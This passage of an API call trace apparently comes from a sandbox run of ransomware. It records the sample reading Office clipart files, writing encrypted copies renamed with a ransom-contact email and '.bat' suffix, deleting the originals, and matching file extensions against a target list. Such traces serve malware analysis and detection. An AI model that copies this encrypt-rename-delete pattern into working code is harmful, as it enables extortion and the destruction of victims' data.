0x3a4 [0197.341] GetLastError () returned 0x0 [0197.341] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x2608, lpOverlapped=0x0) returned 1 [0197.343] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x2610, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x2610, lpOverlapped=0x0) returned 1 [0197.344] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.344] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0197.344] SetEndOfFile (hFile=0x3a4) returned 1 [0197.344] CloseHandle (hObject=0x3a4) returned 1 [0197.344] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.344] SetEndOfFile (hFile=0x358) returned 1 [0197.345] CloseHandle (hObject=0x358) returned 1 [0197.345] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174635.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.346] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174635.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174635.wmf")) returned 1 [0197.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174635.WMF") returned 68 [0197.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174635.WMF") returned 68 [0197.346] lstrlenW (lpString=".doc") returned 4 [0197.346] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.346] lstrlenW (lpString=".docx") returned 5 [0197.346] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0197.346] lstrlenW (lpString=".pdf") returned 4 [0197.346] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.346] lstrlenW (lpString=".xls") returned 4 [0197.346] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.346] lstrlenW (lpString=".xlsx") returned 5 [0197.346] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1 [0197.346] lstrlenW (lpString=".ppt") returned 4 [0197.346] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174635.WMF") returned 68 [0197.346] lstrlenW (lpString=".zip") returned 4 [0197.346] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.346] lstrlenW (lpString=".rar") returned 4 [0197.346] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.346] lstrlenW (lpString=".bz2") returned 4 [0197.346] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.347] lstrlenW (lpString=".7z") returned 3 [0197.347] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174635.WMF") returned 68 [0197.347] lstrlenW (lpString=".dbf") returned 4 [0197.347] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174635.WMF") returned 68 [0197.347] lstrlenW (lpString=".1cd") returned 4 [0197.347] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174635.WMF") returned 68 [0197.347] lstrlenW (lpString=".jpg") returned 4 [0197.347] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174635.WMF") returned 68 [0197.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174635.WMF") returned 68 [0197.347] lstrlenW (lpString=".doc") returned 4 [0197.347] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.347] lstrlenW (lpString=".docx") returned 5 [0197.347] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0197.347] lstrlenW (lpString=".pdf") returned 4 [0197.347] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.347] lstrlenW (lpString=".xls") returned 4 [0197.347] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.347] lstrlenW (lpString=".xlsx") returned 5 [0197.347] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1 [0197.347] lstrlenW (lpString=".ppt") returned 4 [0197.347] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174635.WMF") returned 68 [0197.347] lstrlenW (lpString=".zip") returned 4 [0197.347] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.347] lstrlenW (lpString=".rar") returned 4 [0197.347] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.347] lstrlenW (lpString=".bz2") returned 4 [0197.347] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.348] lstrlenW (lpString=".7z") returned 3 [0197.348] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174635.WMF") returned 68 [0197.348] lstrlenW (lpString=".dbf") returned 4 [0197.348] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174635.WMF") returned 68 [0197.348] lstrlenW (lpString=".1cd") returned 4 [0197.348] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174635.WMF") returned 68 [0197.348] lstrlenW (lpString=".jpg") returned 4 [0197.348] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.348] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0197.348] lstrlenW (lpString="J0174639.WMF") returned 12 [0197.348] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174639.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174639.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0197.349] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=5100) returned 1 [0197.349] CloseHandle (hObject=0x358) returned 1 [0197.349] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174639.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174639.wmf")) returned 0x220 [0197.349] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174639.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174639.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.349] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174639.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174639.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0197.349] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.349] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.349] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174639.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174639.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0197.350] GetLastError () returned 0x0 [0197.350] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x13ec, lpOverlapped=0x0) returned 1 [0197.715] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x13f0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x13f0, lpOverlapped=0x0) returned 1 [0197.716] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.716] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0197.717] SetEndOfFile (hFile=0x3a4) returned 1 [0197.717] CloseHandle (hObject=0x3a4) returned 1 [0197.717] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.717] SetEndOfFile (hFile=0x358) returned 1 [0197.718] CloseHandle (hObject=0x358) returned 1 [0197.718] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174639.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.718] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174639.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174639.wmf")) returned 1 [0197.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174639.WMF") returned 68 [0197.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174639.WMF") returned 68 [0197.719] lstrlenW (lpString=".doc") returned 4 [0197.719] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.719] lstrlenW (lpString=".docx") returned 5 [0197.719] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0197.719] lstrlenW (lpString=".pdf") returned 4 [0197.719] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.719] lstrlenW (lpString=".xls") returned 4 [0197.719] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.719] lstrlenW (lpString=".xlsx") returned 5 [0197.719] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0197.719] lstrlenW (lpString=".ppt") returned 4 [0197.719] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174639.WMF") returned 68 [0197.719] lstrlenW (lpString=".zip") returned 4 [0197.719] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.719] lstrlenW (lpString=".rar") returned 4 [0197.719] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.719] lstrlenW (lpString=".bz2") returned 4 [0197.719] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.719] lstrlenW (lpString=".7z") returned 3 [0197.719] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174639.WMF") returned 68 [0197.719] lstrlenW (lpString=".dbf") returned 4 [0197.719] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174639.WMF") returned 68 [0197.719] lstrlenW (lpString=".1cd") returned 4 [0197.719] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174639.WMF") returned 68 [0197.719] lstrlenW (lpString=".jpg") returned 4 [0197.719] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174639.WMF") returned 68 [0197.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174639.WMF") returned 68 [0197.720] lstrlenW (lpString=".doc") returned 4 [0197.720] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.720] lstrlenW (lpString=".docx") returned 5 [0197.720] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0197.720] lstrlenW (lpString=".pdf") returned 4 [0197.720] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.720] lstrlenW (lpString=".xls") returned 4 [0197.720] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.720] lstrlenW (lpString=".xlsx") returned 5 [0197.720] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0197.720] lstrlenW (lpString=".ppt") returned 4 [0197.720] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174639.WMF") returned 68 [0197.720] lstrlenW (lpString=".zip") returned 4 [0197.720] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.720] lstrlenW (lpString=".rar") returned 4 [0197.720] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.720] lstrlenW (lpString=".bz2") returned 4 [0197.720] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.720] lstrlenW (lpString=".7z") returned 3 [0197.720] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174639.WMF") returned 68 [0197.720] lstrlenW (lpString=".dbf") returned 4 [0197.720] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174639.WMF") returned 68 [0197.720] lstrlenW (lpString=".1cd") returned 4 [0197.721] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174639.WMF") returned 68 [0197.721] lstrlenW (lpString=".jpg") returned 4 [0197.721] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.721] lstrcmpiW (lpString1=".JPG", lpString2=".bat") returned 1 [0197.721] lstrlenW (lpString="J0178460.JPG") returned 12 [0197.721] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178460.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178460.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0197.722] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=26531) returned 1 [0197.722] CloseHandle (hObject=0x358) returned 1 [0197.722] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178460.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178460.jpg")) returned 0x220 [0197.722] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178460.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178460.jpg.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.722] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178460.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178460.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0197.722] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.722] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.722] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178460.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178460.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0197.723] GetLastError () returned 0x0 [0197.723] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x67a3, lpOverlapped=0x0) returned 1 [0197.736] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x67b0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x67b0, lpOverlapped=0x0) returned 1 [0197.737] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.737] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0197.737] SetEndOfFile (hFile=0x3a4) returned 1 [0197.737] CloseHandle (hObject=0x3a4) returned 1 [0197.737] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.737] SetEndOfFile (hFile=0x358) returned 1 [0197.738] CloseHandle (hObject=0x358) returned 1 [0197.739] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178460.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.739] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178460.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178460.jpg")) returned 1 [0197.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178460.JPG") returned 68 [0197.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178460.JPG") returned 68 [0197.739] lstrlenW (lpString=".doc") returned 4 [0197.739] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0197.739] lstrlenW (lpString=".docx") returned 5 [0197.739] lstrcmpiW (lpString1=".docx", lpString2="0.JPG") returned -1 [0197.739] lstrlenW (lpString=".pdf") returned 4 [0197.739] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0197.739] lstrlenW (lpString=".xls") returned 4 [0197.739] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0197.739] lstrlenW (lpString=".xlsx") returned 5 [0197.739] lstrcmpiW (lpString1=".xlsx", lpString2="0.JPG") returned -1 [0197.740] lstrlenW (lpString=".ppt") returned 4 [0197.740] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0197.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178460.JPG") returned 68 [0197.740] lstrlenW (lpString=".zip") returned 4 [0197.740] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0197.740] lstrlenW (lpString=".rar") returned 4 [0197.740] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0197.740] lstrlenW (lpString=".bz2") returned 4 [0197.740] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0197.740] lstrlenW (lpString=".7z") returned 3 [0197.740] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0197.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178460.JPG") returned 68 [0197.740] lstrlenW (lpString=".dbf") returned 4 [0197.740] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0197.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178460.JPG") returned 68 [0197.740] lstrlenW (lpString=".1cd") returned 4 [0197.740] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0197.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178460.JPG") returned 68 [0197.740] lstrlenW (lpString=".jpg") returned 4 [0197.740] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0197.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178460.JPG") returned 68 [0197.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178460.JPG") returned 68 [0197.740] lstrlenW (lpString=".doc") returned 4 [0197.740] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0197.740] lstrlenW (lpString=".docx") returned 5 [0197.740] lstrcmpiW (lpString1=".docx", lpString2="0.JPG") returned -1 [0197.740] lstrlenW (lpString=".pdf") returned 4 [0197.740] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0197.741] lstrlenW (lpString=".xls") returned 4 [0197.741] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0197.741] lstrlenW (lpString=".xlsx") returned 5 [0197.741] lstrcmpiW (lpString1=".xlsx", lpString2="0.JPG") returned -1 [0197.741] lstrlenW (lpString=".ppt") returned 4 [0197.741] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0197.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178460.JPG") returned 68 [0197.741] lstrlenW (lpString=".zip") returned 4 [0197.741] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0197.741] lstrlenW (lpString=".rar") returned 4 [0197.741] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0197.741] lstrlenW (lpString=".bz2") returned 4 [0197.741] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0197.741] lstrlenW (lpString=".7z") returned 3 [0197.741] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0197.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178460.JPG") returned 68 [0197.741] lstrlenW (lpString=".dbf") returned 4 [0197.741] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0197.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178460.JPG") returned 68 [0197.741] lstrlenW (lpString=".1cd") returned 4 [0197.741] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0197.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178460.JPG") returned 68 [0197.741] lstrlenW (lpString=".jpg") returned 4 [0197.741] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0197.741] lstrcmpiW (lpString1=".JPG", lpString2=".bat") returned 1 [0197.742] lstrlenW (lpString="J0178523.JPG") returned 12 [0197.742] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178523.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178523.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0197.742] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=24034) returned 1 [0197.742] CloseHandle (hObject=0x358) returned 1 [0197.742] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178523.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178523.jpg")) returned 0x220 [0197.742] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178523.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178523.jpg.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.743] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178523.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178523.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0197.743] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.743] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.743] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178523.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178523.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0197.744] GetLastError () returned 0x0 [0197.744] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x5de2, lpOverlapped=0x0) returned 1 [0197.782] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x5df0, 